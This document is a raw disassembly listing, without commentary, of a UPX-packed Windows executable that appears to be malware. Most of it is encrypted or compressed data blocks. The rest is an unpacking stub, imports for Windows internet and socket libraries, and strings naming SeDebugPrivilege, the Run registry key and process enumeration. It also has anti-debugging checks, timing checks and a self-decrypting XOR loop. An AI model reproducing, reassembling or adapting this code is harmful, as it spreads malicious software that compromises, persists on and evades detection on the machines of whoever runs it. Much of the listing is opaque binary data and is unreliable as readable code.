dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
push 0ED01C390h
mov eax, esp
call eax
xchg eax, ebx
pop ebx
call loc_31428269
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:31428219�j
jmp short near ptr loc_31428214+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_31428268
call $+5
pop ebp
sub ebp, 402334h
mov eax, [ebp+40237Bh]
add eax, [ebp+402383h]
mov esi, eax
mov eax, [ebp+40237Fh]
add eax, [ebp+402383h]
push eax
mov edi, esi
xor ecx, ecx
loc_31428257: ; CODE XREF: UPX2:31428266�j
lodsb
xor al, [ebp+40238Bh]
stosb
inc ecx
cmp ecx, [ebp+402387h]
jl short loc_31428257
locret_31428268: ; CODE XREF: UPX2:3142822A�j
retn
; ---------------------------------------------------------------------------
loc_31428269: ; CODE XREF: UPX2:3142820B�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax+7Bh], dh
add [edx+31h], al
add [esi], bl
; ---------------------------------------------------------------------------
dw 0
dd 78h, 75Dh dup(0)
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
cld
mov [eax+2FE3h], ebx
test dword ptr [eax+28A0h], 80000000h
mov ebx, [esp+4]
jz short loc_3142A04B
pop ecx
mov [eax+2FE7h], esi
mov [eax+2FEBh], edi
cmp byte ptr [eax+28A4h], 0E8h
jnz short loc_3142A042
add ebx, [eax+28A5h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3142A04A
; ---------------------------------------------------------------------------
loc_3142A042: ; CODE XREF: UPX2:3142A033�j
mov ebx, [eax+28A6h]
push dword ptr [ebx]
loc_3142A04A: ; CODE XREF: UPX2:3142A040�j
pop ebx
loc_3142A04B: ; CODE XREF: UPX2:3142A01D�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1E05h
sub ebp, 361005h
mov edi, [esp+4]
lea esi, [ebp+3638B0h]
mov ecx, 6Dh
rep movsb
call sub_3142A0C0
mov ecx, eax
call sub_3142A0C0
sub eax, ecx
jz short loc_3142A094
cmp eax, 100h
ja short loc_3142A094
lea eax, [ebp+3610D3h]
mov dl, [eax-10h]
call sub_3142A0C4
jmp short loc_3142A0D3
; ---------------------------------------------------------------------------
loc_3142A094: ; CODE XREF: UPX2:3142A07B�j
; UPX2:3142A082�j
test dword ptr [ebp+3638A5h], 80000000h
jz short loc_3142A0BE
lea esi, [ebp+3638A9h]
mov edi, [esp+4]
movsb
movsd
mov esi, [ebp+363FECh]
mov edi, [ebp+363FF0h]
mov ebx, [ebp+363FE8h]
loc_3142A0BE: ; CODE XREF: UPX2:3142A09E�j
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_3142A0C0 proc near ; CODE XREF: UPX2:3142A06D�p
; UPX2:3142A074�p
rdtsc
retn
sub_3142A0C0 endp
; ---------------------------------------------------------------------------
xchg eax, esi
; =============== S U B R O U T I N E =======================================
sub_3142A0C4 proc near ; CODE XREF: UPX2:3142A08D�p
mov dh, dl
mov ecx, 27D2h
loc_3142A0CB: ; CODE XREF: sub_3142A0C4+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_3142A0CB
retn
sub_3142A0C4 endp
; ---------------------------------------------------------------------------
loc_3142A0D3: ; CODE XREF: UPX2:3142A092�j
pop ss
iret
; ---------------------------------------------------------------------------
retn 11A8h
; ---------------------------------------------------------------------------
dd 8CB9B7Bh, 0ED611A88h, 1DE1C240h, 4EB8238Ch, 659B9591h
dd 9854913Fh, 13901215h, 0FE936E99h, 8DA3D93Ch, 144312EEh
dd 0E7D389ECh, 68BBE1E1h, 12D24225h, 3F21E7ACh, 75EFEF2Ch
dd 6BAC26EDh, 9B6970E6h, 3A84DB9Fh, 2FC4383Fh, 7937510Fh
dd 5C1BB460h, 0F51351A0h, 25432D20h, 2E980E84h, 0E99C19C4h
dd 0BF00D76Fh, 53CC6E1Ah, 580731CCh, 0DD163FADh, 3340124Ah
dd 0D5006AD4h, 9A39A75Eh, 23C65FE1h, 9E4906B2h, 7FB63567h
dd 78836809h, 0A61D92E4h, 9B2FD23Ch, 25A166E0h, 0DC6AC798h
dd 5570A82Bh, 0DB41E463h, 0B616B1BAh, 0E7B21A4h, 6910BFA4h
dd 41D79178h, 837FBAABh, 6EEE79E2h, 433F5A81h, 1E88F1DDh
dd 63CCF734h, 0BB39A23Ah, 0CE250570h, 80E86483h, 0E0558699h
dd 0AA1D8D6Ch, 6DF06CD1h, 5AED311Bh, 36A03C61h, 9B8CC74Fh
dd 6550BA12h, 8BD6AD9h, 33836AD4h, 0EE6ED750h, 0C3764D84h
dd 9E3E600Dh, 0A4D54335h, 0C3B814B7h, 90058A51h, 73A1E13Ch
dd 60FB7429h, 463833ECh, 670D9C8h, 0C05DCDC3h, 7720BCCFh
dd 8A77FDA4h, 66D03A70h, 0D43CD577h, 7E43E914h, 66D852ACh
dd 0FD661F8Dh, 17E0F26Ah, 1CE04AC4h, 18AD5D0Ch, 0A390CC5Fh
dd 906C5D7Ch, 4140AA16h, 3E98B7E1h, 697B5AF2h, 0DE44B1A5h
dd 364D8B74h, 3F854DCh, 0D042EBB1h, 0C10DE17Ch, 0B6ECE936h
dd 0E6323EA7h, 0CBE9DAB7h, 0A8134B49h, 7DCB3934h, 5EEFAB70h
dd 0F10C3D1Ah, 0FF68D154h, 55D594h, 2D18B4D7h, 0C6F5FA80h
dd 5C57B693h, 0DCB78AF4h, 6679884Ch, 0E6D03EA4h, 0BF289294h
dd 40151554h, 0EBD87497h, 44B495C4h, 7488F25Eh, 76881AB4h
dd 0A438A60Ch, 2A783B64h, 2EE938EBh, 0D740AB7Ch, 780DFD6Ch
dd 0EEF06CFFh, 0DE49B216h, 0DF69F8Bh, 8B1062FAh, 0F50BA24h
dd 3EA8102Dh, 75596ABEh, 1152A826h, 708BD011h, 5DF999DCh
dd 0CD1677B7h, 41B822BAh, 0A6124E60h, 0FE6E3A3Ch, 28E2A94h
dd 0AE54CEA8h, 3DE24FBBh, 0EB4532AAh, 0B6169D3Eh, 0B3F52B7Fh
dd 66E6017Ah, 56BB9C4Dh, 1680E820h, 52CAFF2Fh, 0C9309A32h
dd 1E8AF2D8h, 9465C1B4h, 31389437h, 0A31FFB14h, 7EDE6540h
dd 0EDBA2F9Fh, 5E67025Ah, 0CF75D5C5h, 55488424h, 9BECF1h
dd 8F889DCCh, 0DE003FABh, 0B323124Ah, 9636513Eh, 9FA7D8CFh
dd 1B359585h, 150844E4h, 0C05B38B9h, 0B1B1C18Ch, 239F7B95h
dd 0FE5EEA56h, 56C1927Ch, 0C6A50FECh, 8D70EC78h, 0A8C85853h
dd 0B250752Dh, 647B03CFh, 312939E4h, 0A6429296h, 3575FD9h
dd 7761429Ah, 4B309A04h, 0E176BF58h, 0DD86B54Bh, 0CE75A681h
dd 4090FA64h, 7AAFDF17h, 5BA498BFh, 18A316F9h, 0F96F6C4h
dd 5DE3D41Eh, 0C34208B6h, 8E92B647h, 0E620B34Ch, 5464997Ch
dd 0FCC4E1D4h, 0EE58AA2Ch, 6DA1284h, 9062208Dh, 18F53564h
dd 16B814B7h, 0CE50BE67h, 0FE68A235h, 56AAFE1Fh, 0EE724E67h
dd 41ADA2Eh, 36C858CEh, 0B620FAFDh, 6429E226h, 0F32F6A5Bh
dd 0BE1EA90Ah, 0E905B30Bh, 6FDFC6A3h, 73BD9A04h, 1EBEE25Ch
dd 76EC490Dh, 3DD7290Ch, 267D7BC1h, 0F3E864ACh, 0E0549D91h
dd 7E78FD6Ch, 0ECD03090h, 20DD4DE3h, 0B3A03C4Fh, 0BA8D3D0Ch
dd 0E651F4CCh, 3EB9FA7Ch, 0F3536AD4h, 9B3AA768h, 2FC24AE3h
dd 0FB641BAAh, 0A160AF53h, 4EBD6D64h, 0CAA585E4h, 168E403h
dd 60FBA801h, 3BE7D5ECh, 646E102h, 5CA232F6h, 8D561F0Bh
dd 26C1E27Ah, 0F1D03AA5h, 0B2A173D7h, 0E9D7BE70h, 58E3F839h
dd 45C6A904h, 28B4A4F9h, 21B44AB4h, 0F58637F3h, 0E615FA52h
dd 0FDAE34C8h, 3832AEEAh, 26BC7693h, 0AC9A5AAEh, 0E5FE27E3h
dd 0F6250A42h, 666BBEB8h, 0E650BFA3h, 0DD39DB4Fh, 0C08553EEh
dd 9B58F410h, 62CC9BB6h, 0EC7B11F8h, 7748BE47h, 4EB6BF4Dh
dd 0F6442AE4h, 0AE38836Ah, 3855D5C7h, 2B18B4D7h, 9048384h
dd 56EC4663h, 8A760F7Bh, 0CB90E27Ah, 352FC559h, 856E0703h
dd 986BEA62h, 6FF0862Dh, 39679A04h, 28B3B4C9h, 3075B5B4h
dd 27389437h, 0D96F010Ch, 7E8208BCh, 0D62AAA7Eh, 2FF00206h
dd 0DF05EC4h, 8E48D8D8h, 0F22B061Eh, 0F6AE8033h, 0E6508E7Bh
dd 0E440DB4Fh, 1BFF952Bh, 0D84D84B9h, 17E14884h, 0D49D8D8Ch
dd 7560FC0Fh, 0DE7B0248h, 0A64822BCh, 0FE68E235h, 56C024FCh
dd 0AE1882EDh, 670DA44h, 5EC8329Ch, 0B620A251h, 0E78E24Ch
dd 99836CF5h, 8813C069h, 0BAD94154h, 95AD8228h, 4BF374E6h
dd 289183C9h, 0E31F18B4h, 0CE0E99A6h, 19FC7FEDh, 6800528Ah
dd 9A40AA14h, 5BF36D03h, 0EF820AB4h, 0BB24DB6Ah, 57F66F13h
dd 0CF9D17A0h, 73AFEA24h, 3E9E292Eh, 0A970EF5Dh, 0B29BC21Ah
dd 23C37BC6h, 0FB651392h, 9C028550h, 3DCC41E9h, 0F5642CB8h
dd 0FE1CB159h, 24B459F8h, 0AE76E780h, 6715A807h, 378E57E8h
dd 0B661EF98h, 6F1D900Fh, 0F965FD0h, 0DF65F790h, 78E99A24h
dd 2DD803CBh, 0B251FF76h, 71FAA239h, 5932FD7h, 0BC7BA24Dh
dd 43E49B01h, 118537EEh, 0BE14CF60h, 4AF9671Eh, 0E38219C4h
dd 8A2DC67Dh, 57C5781Ch, 0FCBB62A8h, 8324DB41h, 52C77D28h
dd 0E66C0FBCh, 800BF01Fh, 2EC36AE5h, 0DB0806B3h, 0A214A34Ch
dd 2FDD50E4h, 0CF567A80h, 973CB750h, 39944FF9h, 0DA6BFBBFh
dd 6F24B721h, 18C857F1h, 0FA45EF86h, 6F0A8025h, 21D043D6h
dd 0D76EE699h, 62C18F38h, 0CB130D8h, 0B555EE71h, 7BCFF21Dh
dd 1A890CC0h, 0B451F169h, 43D7FA01h, 128114C8h, 0BB29FE71h
dd 4BDF0209h, 0E29F17B0h, 962DDE69h, 5AC46415h, 0C9F823A9h
dd 8304CE41h, 57EE6211h, 0F74E0FB8h, 0EE19A741h, 12C47FC3h
dd 0CE781FB9h, 0B708BE55h, 3ADD658Ch, 0D5621FB2h, 0FE06BD55h
dd 0B44FD3h, 0C76BF089h, 7E35B42Bh, 3B8F32DDh, 0DA4FDC80h
dd 471D8F39h, 14BF5CCAh, 0D75CF391h, 16C1843Bh, 0AB92DE0h
dd 0B452F348h, 5FF1803Dh, 68107B4h, 0B95DCB5Ah, 4FD69C2Bh
dd 31E837D0h, 902ECF64h, 63FD6E05h, 0EF802AA5h, 0DE09D572h
dd 58C57A3Bh, 0ED97109Ch, 0E623C941h, 5DC7602Ch, 0A57319B1h
dd 9C31841Eh, 16B06EF7h, 0FB6B1DAEh, 0C453B947h, 3AC047C2h
dd 0D27529E4h, 9B04BB7Ah, 24B45ED5h, 0DA6DE085h, 631A921h
dd 18BC57CFh, 0E245E69Dh, 0E1D8F25h, 3B556F7h, 0C77B928Ch
dd 7BE59E27h, 0BB52BF8h, 0AF76F550h, 77DC9730h, 23E02FD9h
dd 0BE59CF62h, 51F59332h, 17AE34F3h, 8040CF78h, 5BEC7005h
dd 0EAB136A5h, 0DE2BDD70h, 42C97823h, 0E29124A9h, 921EBA41h
dd 4BC2763Dh, 0E4501EA7h, 8231B445h, 35D57DE1h, 0FB631D88h
dd 822ECA5Ah, 2FDD50CFh, 0CF561F90h, 0B068B750h, 33B269E0h
dd 0FE7DF68Dh, 6313B536h, 10C841EFh, 0D352C980h, 5E1D962Dh
dd 3B355D6h, 0C66DE18Fh, 55F4A454h, 1AB927DEh, 0A555C961h
dd 70E79B28h, 359404B4h, 0BA59C77Eh, 43E3AF01h, 119A02CEh
dd 0A533CF77h, 63EC4C6Ch, 0EFA62AA5h, 0B807C579h, 42C36F27h
dd 8E960DA5h, 961FCE6Ah, 57EE7C19h, 0D8000FB8h, 8B288D58h
dd 29C24AEAh, 0ED7B17BFh, 930BA560h, 3AF622E2h, 0C8750AABh
dd 8A0BB76Fh, 56AE45FDh, 0DC48F6A2h, 6515AE2Bh, 2CA164E8h
dd 0DA41FF80h, 61158701h, 28D043D6h, 0DB5DC388h, 78C99326h
dd 3AA2DCAh, 0A959EE65h, 75E7A632h, 38E024D1h, 0A74AF578h
dd 4FC69F10h, 1F9D26CEh, 0BB25E778h, 2EE17003h, 0D39C2E96h
dd 0B12BDB72h, 42F36F10h, 0E9960BBEh, 8811D570h, 4AFB7B0Fh
dd 0F16E03A6h, 0AF0B952Ch
dd 34D16ED7h, 9E7807A8h, 850FA657h, 2DD751E9h, 0A6641F8Fh
dd 9006BD5Fh, 56B449F1h, 0C66CE78Bh, 6404A92Bh, 33A95CE5h
dd 0D3528A91h, 7D78942Fh, 66B454C1h, 0D54BFD8Fh, 5F809E31h
dd 1CBD36C2h, 8544FF6Ah, 7BFB9D30h, 128E2BFCh, 8738C760h
dd 54F58E0Ah, 399C37D2h, 0B903DE71h, 4DFD6C02h, 0D5943FB0h
dd 0BB3CD368h, 42CE4374h, 0EB9610A9h, 8320F550h, 77A85312h
dd 0E4651EBAh, 0A12CA742h, 13DE7FF4h, 9E491EAEh, 9314A47Dh
dd 3ADD4CFEh, 0C2711FB6h, 9B04BB7Ah, 846B94h, 9D51D2ADh
dd 4A34F476h, 3B9A32D0h, 0D94CC993h, 6B33873Fh, 3823ADDh
dd 0DB58DD9Bh, 6FE5A13Ah, 6E993AE9h, 9757FF56h, 67FA9729h
dd 38C2BE2h, 8F40E769h, 41F5A864h, 289C37EFh, 0B335C675h
